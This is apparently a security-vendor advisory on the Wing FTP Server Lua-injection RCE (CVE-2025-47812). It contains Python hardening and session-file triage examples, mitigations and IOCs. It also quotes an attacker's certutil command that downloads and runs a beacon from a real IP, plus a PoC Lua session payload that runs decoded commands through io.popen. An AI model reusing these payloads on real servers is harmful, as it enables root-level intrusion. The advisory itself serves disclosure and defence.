SOCRadar® Cyber Intelligence Inc. | CVE-2025-47812: Wing FTP Server Exposed to Root-Level RCE Attacks
Jul 11, 2025
Moon

CVE-2025-47812: Wing FTP Server Exposed to Root-Level RCE Attacks

Wing FTP Server has been found vulnerable to a severe security flaw that is now under active exploitation. Identified as CVE-2025-47812, this Remote Code Execution (RCE) vulnerability carries a maximum severity score. With the ability to grant attackers SYSTEM/root-level access without authentication, the flaw poses a serious threat.

Wing FTP is a cross-platform file transfer server supporting FTP, FTPS, SFTP, and HTTP/S protocols. It includes a web-based admin interface for remote management, making it suitable for diverse organizational needs. Over 10,000 customers use Wing FTP, including entities like Airbus, Reuters, and the U.S. Air Force.

What Is CVE-2025-47812?

CVE-2025-47812 (CVSS 10.0) is a critical vulnerability discovered in Wing FTP Server versions prior to 7.4.4. The issue stems from improper input handling in the authentication logic, specifically within the loginok.html endpoint that processes login requests.

The vulnerability is a combination of a null byte injection and Lua code injection flaw, leading to Remote Code Execution (RCE).

CVE-2025-47812 details (SOCRadar Vulnerability Intelligence)

Attackers exploit the flaw by inserting a %00 null byte into the username parameter, which prematurely terminates the string processing. This, in combination with crafted Lua code, enables adversaries to inject arbitrary commands into session files managed by the server’s Lua interpreter. When those session files are read by the application, typically during a subsequent request to any server endpoint such as dir.html, the injected code is executed with elevated privileges.

The fact that this vulnerability is exploitable across all major operating systems supported by Wing FTP (Windows, Linux, macOS) increases its potential impact.
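To make the root cause concrete, here is an added Python example; it is not Wing FTP's code and the function names are hypothetical. The _SESSION['key']=[[value]] line format is taken from the PoC session file quoted later on this page. A naive writer drops a value straight into a Lua long string, so a value containing ]] closes the string early and leaves trailing text that the Lua interpreter would parse as code; the hardened writer rejects NUL bytes and unexpected keys and chooses a long-bracket level ([=[ ... ]=]) whose closing token cannot occur inside the value. A small scanner reads the line the way Lua would and returns any trailing text, which is how the difference shows up.

```python
import re

# Session line format as it appears in the PoC session file on this page:
#   _SESSION['key']=[[value]]
# The functions below are hypothetical, added for illustration; they are not Wing FTP's code.

def naive_session_line(key, value):
    """Unsafe: the value is dropped straight into a Lua long string."""
    return f"_SESSION['{key}']=[[{value}]]"

def lua_long_bracket(value):
    """Wrap value in the shortest Lua long bracket whose closing token does not occur in it."""
    level = 0
    while f"]{'=' * level}]" in value:
        level += 1
    eq = "=" * level
    return f"[{eq}[{value}]{eq}]"

def safe_session_line(key, value):
    """Hardened writer: reject NUL bytes and unexpected keys, then use a non-colliding long bracket."""
    if "\x00" in value:
        raise ValueError("NUL byte in session value")
    if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", key):
        raise ValueError("unexpected session key")
    return f"_SESSION['{key}']={lua_long_bracket(value)}"

_OPEN = re.compile(r"^_SESSION\['([A-Za-z0-9_]+)'\]=\[(=*)\[")

def parse_session_line(line):
    """Read one serialized line the way a Lua long-string scanner would.

    Returns (key, value, trailing). For a well-formed line trailing is empty;
    anything else is text that Lua would go on to parse as code.
    """
    m = _OPEN.match(line)
    if not m:
        return None
    key, eq = m.group(1), m.group(2)
    closing = f"]{eq}]"
    start = m.end()
    end = line.find(closing, start)
    if end < 0:
        return None
    return key, line[start:end], line[end + len(closing):]

if __name__ == "__main__":
    # Constructed value: a username that carries the long-string terminator.
    hostile = "anonymous]]extra"
    print(parse_session_line(naive_session_line("username", hostile)))  # trailing text escapes
    print(parse_session_line(safe_session_line("username", hostile)))   # trailing text is empty
```

The scanner returns the trailing text rather than printing it, so the same function can be pointed at existing session files during an incident review.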

How Attackers Exploit CVE-2025-47812

  1. Entry Point: Malicious Login Requests

Exploitation begins with a POST request to loginok.html, using either known credentials or anonymous access if enabled. The attacker injects a payload in the username field, appending two closing square brackets (]]) and Lua code, followed by a trailing sequence that neutralizes any remaining syntax errors.

This injection corrupts the session object and effectively replaces legitimate values with attacker-defined scripts. These session objects are stored in .lua files that the server routinely loads, triggering the execution of the injected payload.

  2. Payload Execution via Lua

The injected payloads often include base16-encoded strings converted back into executable commands using a Lua hx() function. One decoded command retrieved and executed a malicious binary using certutil:

certutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe

This binary acted as a beacon, potentially giving remote attackers persistent control over the system. Other observed scripts aimed to download additional payloads, install remote support tools, or exfiltrate system information.

Adversary Activity and Tactics Used

During their activity, threat actors executed a series of commands designed to map the environment and gain persistence:

  • Network reconnaissance via ipconfig, arp -a, and nslookup.
  • Enumeration of system users and privileges using whoami, net user, and PowerShell scripts.
  • Creation of new user accounts to maintain access.
  • Attempts to use curl and certutil for downloading additional malware.

Interestingly, attackers showed signs of inexperience, evident from malformed commands containing non-printable characters and invalid syntax. These missteps did not stop persistent attempts, including efforts to install ScreenConnect or use PowerShell for script execution.

Proof of Concept (PoC) for CVE-2025-47812

Researchers provided a technical breakdown and Proof-of-Concept (PoC) exploit illustrating this vulnerability in action. An example .lua session file used for injection included the following Lua logic:

_SESSION['username']=[[anonymous]]
local function hx(s) return (s:gsub('..', function(x) return string.char(tonumber(x,16)) end)) end
local cmd = hx("63657274…")
local h = io.popen(cmd)
local r = h:read("*a")
h:close()
--]]
_SESSION['ipaddress']=[[185.196.9.225]]
_SESSION['currentpath']=[[/]]

The payload’s embedded command fetched a binary from a remote server, saved it to a temporary directory, and executed it. These session files are easy to overlook, yet serve as the primary execution vectors for this attack.

Monitor all your assets, identify & assess vulnerabilities easily with SOCRadar’s Attack Surface Management

Understanding exactly what assets you have exposed and which vulnerabilities pose the greatest risk is key to effective cybersecurity. SOCRadar’s Attack Surface Management (ASM) continuously scans your external environment to uncover vulnerable systems, misconfigurations, and hidden digital assets.

Combined with SOCRadar’s Cyber Threat Intelligence module, including powerful Vulnerability Intelligence, you get up-to-date alerts on new CVEs, ongoing exploit activity, and relevant context. This helps your team focus on the most urgent issues and patch faster to keep attackers at bay.

How to Defend Your Wing FTP Server Against This Vulnerability

System administrators should review the following indicators:

  • Abnormal Session Files: Stored under C:\Program Files (x86)\Wing FTP Server\session. Files with unusually large sizes or containing Lua logic should be flagged.
  • Malformed Log Entries: Found in C:\Program Files (x86)\Wing FTP Server\Log\Domains\[domain]\YYYY-M-D.log; look for truncated entries such as User 'anonymous (missing closing quote).
  • Unexpected Process Activity: Look for cmd.exe, curl, or powershell processes invoked under WFTPServer.exe.
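The first two indicators can be checked mechanically. The following Python script is an added example, not Wing FTP's or the researchers' tooling: it classifies each line of a session file as a plain _SESSION assignment or as foreign Lua, flags risky calls such as io.popen, decodes any base16 literal passed to an hx() call so an analyst can read the command without running it, and scans log lines for a User 'name entry with no closing quote. The sample session text and log lines are constructed for the demonstration, the log line layout is an assumption, and the session directory path is the one given above.

```python
import re
from pathlib import Path

# A benign session line, as in the PoC on this page: _SESSION['key']=[[value]]
# A value containing "]]" is never benign, since it would close the Lua long string early.
BENIGN_ASSIGN = re.compile(r"^_SESSION\['[A-Za-z0-9_]+'\]=\[\[(?:(?!\]\]).)*\]\]$")
# Lua calls that have no business in a session file (hx() is the decoder described above).
RISKY_TOKENS = ("io.popen", "os.execute", "load(", "loadstring", "dofile", "require", "hx(")
HEX_LITERAL = re.compile(r"""hx\(\s*['"]([0-9A-Fa-f]{2,})['"]\s*\)""")
# Assumed log layout: the page only says the entry reads User 'anonymous with no closing quote.
TRUNCATED_USER = re.compile(r"User '([^']*)$")
# Session directory named on this page.
SESSION_DIR = r"C:\Program Files (x86)\Wing FTP Server\session"

def decode_hex(hexstr):
    """Decode a base16 literal the way the PoC's hx() does, for reading only."""
    return bytes.fromhex(hexstr).decode("latin-1")

def triage_session_text(text):
    """Classify session-file lines; returns findings rather than executing anything."""
    foreign, risky = [], []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if not BENIGN_ASSIGN.match(line):
            foreign.append((n, line))
        hits = [t for t in RISKY_TOKENS if t in line]
        if hits:
            risky.append((n, hits))
    decoded = [decode_hex(h) for h in HEX_LITERAL.findall(text)]
    return {"suspicious": bool(foreign or risky), "foreign_lines": foreign,
            "risky_calls": risky, "decoded_hex": decoded}

def triage_session_dir(session_dir, max_size=4096):
    """Run the triage over every .lua file in a session directory; max_size is an assumed threshold."""
    results = {}
    for p in Path(session_dir).glob("*.lua"):
        r = triage_session_text(p.read_text(encoding="utf-8", errors="replace"))
        r["oversized"] = p.stat().st_size > max_size
        results[p.name] = r
    return results

def truncated_log_entries(lines):
    """Return (line number, username) for log entries whose quoted username never closes."""
    found = []
    for n, line in enumerate(lines, 1):
        m = TRUNCATED_USER.search(line.rstrip("\r\n"))
        if m:
            found.append((n, m.group(1)))
    return found

# Constructed samples for the demonstration (not real captures).
SAMPLE_CLEAN = (
    "_SESSION['username']=[[alice]]\n"
    "_SESSION['ipaddress']=[[10.0.0.5]]\n"
    "_SESSION['currentpath']=[[/]]\n"
)
SAMPLE_INJECTED = (
    "_SESSION['username']=[[anonymous]]\n"
    "local function hx(s) return (s:gsub('..', function(x) return string.char(tonumber(x,16)) end)) end\n"
    "local cmd = hx(\"77686f616d69\")\n"   # constructed: base16 for the harmless string 'whoami'
    "local h = io.popen(cmd)\n"
    "--]]\n"
    "_SESSION['ipaddress']=[[192.0.2.10]]\n"
)
SAMPLE_LOG = [
    "[2025-07-10 09:12:01] User 'alice' logged in from 10.0.0.5",
    "[2025-07-10 09:13:44] User 'anonymous",
]

if __name__ == "__main__":
    print(triage_session_text(SAMPLE_CLEAN)["suspicious"])      # False
    print(triage_session_text(SAMPLE_INJECTED))                  # foreign lines, risky calls, 'whoami'
    print(truncated_log_entries(SAMPLE_LOG))                     # [(2, 'anonymous')]
    if Path(SESSION_DIR).is_dir():
        print(triage_session_dir(SESSION_DIR))
```

The decoder only turns the hex literal back into text so the command can be recorded in the incident timeline; nothing in the script executes session content, and the oversized flag covers the "unusually large" indicator with a threshold you should tune to your own baseline.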

Recommended Mitigations

To secure your systems:

  • Patch Immediately: Upgrade to Wing FTP Server version 7.4.4 or later, where this vulnerability is resolved.
  • Limit Access: Disable anonymous login unless strictly necessary.
  • Audit Lua Files: Regularly inspect .lua session files and remove those containing executable logic.
  • Enhance Monitoring: Use EDR tools to monitor for suspicious command execution and behavioral anomalies.
  • Apply Sigma Rule & Monitor IOCs: Apply the Sigma rule provided here to identify exploitation attempts, and monitor for known Indicators of Compromise (IOCs) to detect malicious activity. The IOCs provided by the researchers are listed in the next section.

For a detailed technical analysis, including the PoC exploit and video demonstration, refer to the Huntress research blog.

Indicators of Compromise (IOCs)

Attacker IP Addresses:

  • 223.160.131[.]104
  • 149.248.44[.]88
  • 103.88.141[.]42
  • 185.196.9[.]225
  • 146.70.11[.]39

Webhook Site:

  • https://webhook[.]site/5d112487-6133-4942-ac87-3f473d44bd81

Backdoor usernames used by the attackers: 

  • wing
  • wingftp

Passwords used for attacker accounts: 

  • 123123qweqwe
  • 123123qweqweq

Beacon: 

  • URL: http://185.196.9[.]225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe
  • PATH: %TEMP%\mvveiWJHx.exe
  • SHA256: c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4

Microsoft Defender Detection: 

  • Trojan:Win32/Ceprolad.A

ScreenConnect Installer: 

  • URL: https://oooooooo11.screenconnect[.]com/bin/screenconnect.clientsetup.msi
  • PATH: c:\1.msi
  • SHA256: f0fcc638cd93bdd6fb4745d75b491395a7a1b2cb08e0153a2eb417cb2f58d8ac

ScreenConnect Callback URL:

  • instance-y9tbyl-relay.screenconnect[.]com